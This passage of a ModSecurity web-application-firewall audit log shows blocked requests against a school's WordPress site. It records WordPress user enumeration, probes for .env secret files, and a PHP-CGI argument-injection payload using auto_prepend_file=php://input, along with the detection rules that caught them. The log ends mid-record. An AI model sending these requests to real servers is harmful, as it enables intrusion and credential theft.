[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747056208727486 3387 (- - -) Stopwatch2: 1747056208727486 3387; combined=1498, p1=495, p2=971, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1130e060-Z-- --faeb8341-A-- [12/May/2025:20:35:57 +0700] aCH5PRKpX3ymKhxxBshV-QAAAE8 103.236.140.4 44408 103.236.140.4 8181 --faeb8341-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.114.252.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.114.252.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --faeb8341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faeb8341-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747056957271344 3449 (- - -) Stopwatch2: 1747056957271344 3449; combined=1507, p1=476, p2=996, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faeb8341-Z-- --73c94a6b-A-- [12/May/2025:20:58:31 +0700] aCH-hxLjIumP119c9posFgAAAA4 103.236.140.4 48826 103.236.140.4 8181 --73c94a6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.87.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.87.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73c94a6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c94a6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747058311121933 2353 (- - -) Stopwatch2: 1747058311121933 2353; combined=1323, p1=443, p2=852, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c94a6b-Z-- --d6f3c26f-A-- [12/May/2025:20:59:03 +0700] aCH-pxKpX3ymKhxxBshX4QAAAFQ 103.236.140.4 50460 103.236.140.4 8181 --d6f3c26f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) Accept-Charset: utf-8 --d6f3c26f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f3c26f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747058343665308 938 (- - -) Stopwatch2: 1747058343665308 938; combined=472, p1=426, p2=0, p3=0, p4=0, p5=45, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f3c26f-Z-- --a6d87c61-A-- [12/May/2025:21:39:47 +0700] aCIIM-ll0ld2l7Li0sdvkgAAAIs 103.236.140.4 39870 103.236.140.4 8181 --a6d87c61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a6d87c61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d87c61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747060787325659 783 (- - -) Stopwatch2: 1747060787325659 783; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d87c61-Z-- --68a98418-A-- [12/May/2025:21:39:49 +0700] aCIINRLjIumP119c9ppEdgAAABY 103.236.140.4 39934 103.236.140.4 8181 --68a98418-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --68a98418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68a98418-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747060789536198 771 (- - -) Stopwatch2: 1747060789536198 771; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68a98418-Z-- --719eb150-A-- [12/May/2025:21:50:37 +0700] aCIKvRKpX3ymKhxxBshvVwAAAFc 103.236.140.4 55428 103.236.140.4 8181 --719eb150-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.186.128.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.186.128.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --719eb150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --719eb150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747061437095479 3130 (- - -) Stopwatch2: 1747061437095479 3130; combined=1407, p1=460, p2=834, p3=0, p4=0, p5=113, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --719eb150-Z-- --2434231d-A-- [12/May/2025:21:52:26 +0700] aCILKhLjIumP119c9ppJigAAABQ 103.236.140.4 57832 103.236.140.4 8181 --2434231d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.242.57.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.242.57.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2434231d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2434231d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747061546959363 2848 (- - -) Stopwatch2: 1747061546959363 2848; combined=1409, p1=461, p2=912, p3=0, p4=0, p5=35, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2434231d-Z-- --6f5afa1b-A-- [12/May/2025:22:28:59 +0700] aCITu34i-S7TW27OkGm8eAAAAMQ 103.236.140.4 50670 103.236.140.4 8181 --6f5afa1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.14.48.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.14.48.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f5afa1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f5afa1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747063739726200 2652 (- - -) Stopwatch2: 1747063739726200 2652; combined=1320, p1=446, p2=841, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f5afa1b-Z-- --ef5e0c56-A-- [12/May/2025:23:17:52 +0700] aCIfMBKpX3ymKhxxBsiLSwAAAEU 103.236.140.4 58744 103.236.140.4 8181 --ef5e0c56-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ef5e0c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef5e0c56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066672943020 728 (- - -) Stopwatch2: 1747066672943020 728; combined=259, p1=216, p2=0, p3=0, p4=0, p5=43, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef5e0c56-Z-- --3684d238-A-- [12/May/2025:23:20:27 +0700] aCIfy-ll0ld2l7Li0seRmQAAAIM 103.236.140.4 33790 103.236.140.4 8181 --3684d238-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3684d238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3684d238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066827382642 828 (- - -) Stopwatch2: 1747066827382642 828; combined=388, p1=343, p2=0, p3=0, p4=0, p5=44, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3684d238-Z-- --19675778-A-- [12/May/2025:23:20:29 +0700] aCIfzX4i-S7TW27OkGnMpQAAAM0 103.236.140.4 33826 103.236.140.4 8181 --19675778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --19675778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19675778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066829471310 825 (- - -) Stopwatch2: 1747066829471310 825; combined=355, p1=307, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19675778-Z-- --795a9c48-A-- [12/May/2025:23:34:27 +0700] aCIjE34i-S7TW27OkGnQ8AAAAMs 103.236.140.4 52182 103.236.140.4 8181 --795a9c48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 89.38.15.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.38.15.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --795a9c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --795a9c48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747067667633222 2470 (- - -) Stopwatch2: 1747067667633222 2470; combined=1087, p1=353, p2=701, p3=0, p4=0, p5=33, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --795a9c48-Z-- --57774231-A-- [12/May/2025:23:41:19 +0700] aCIkrxLjIumP119c9ppt_AAAABY 103.236.140.4 32938 103.236.140.4 8181 --57774231-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --57774231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57774231-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747068079016252 854 (- - -) Stopwatch2: 1747068079016252 854; combined=408, p1=368, p2=0, p3=0, p4=0, p5=40, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57774231-Z-- --7ba6ee59-A-- [12/May/2025:23:46:06 +0700] aCIlzhKpX3ymKhxxBsiUYwAAAFE 103.236.140.4 39252 103.236.140.4 8181 --7ba6ee59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 95.214.54.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 95.214.54.165 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7ba6ee59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ba6ee59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747068366997517 890 (- - -) Stopwatch2: 1747068366997517 890; combined=386, p1=342, p2=0, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ba6ee59-Z-- --5dd1121d-A-- [13/May/2025:00:01:03 +0700] aCIpTxLjIumP119c9pp0_QAAABI 103.236.140.4 59102 103.236.140.4 8181 --5dd1121d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.99.196 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.99.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5dd1121d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd1121d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747069263237930 817 (- - -) Stopwatch2: 1747069263237930 817; combined=333, p1=291, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd1121d-Z-- --85ddba20-A-- [13/May/2025:00:09:19 +0700] aCIrP34i-S7TW27OkGndSgAAANA 103.236.140.4 41442 103.236.140.4 8181 --85ddba20-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --85ddba20-C-- --85ddba20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85ddba20-E-- --85ddba20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747069759596058 5094 (- - -) Stopwatch2: 1747069759596058 5094; combined=3546, p1=686, p2=2812, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85ddba20-Z-- --708c6e4d-A-- [13/May/2025:00:25:32 +0700] aCIvDOll0ld2l7Li0sejCwAAAIc 103.236.140.4 34100 103.236.140.4 8181 --708c6e4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.163.182.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.163.182.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --708c6e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --708c6e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747070732561746 2369 (- - -) Stopwatch2: 1747070732561746 2369; combined=1214, p1=404, p2=780, p3=0, p4=0, p5=30, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708c6e4d-Z-- --ec260d3d-A-- [13/May/2025:00:35:59 +0700] aCIxfxKpX3ymKhxxBsijCQAAAFQ 103.236.140.4 47810 103.236.140.4 8181 --ec260d3d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.39.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.39.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 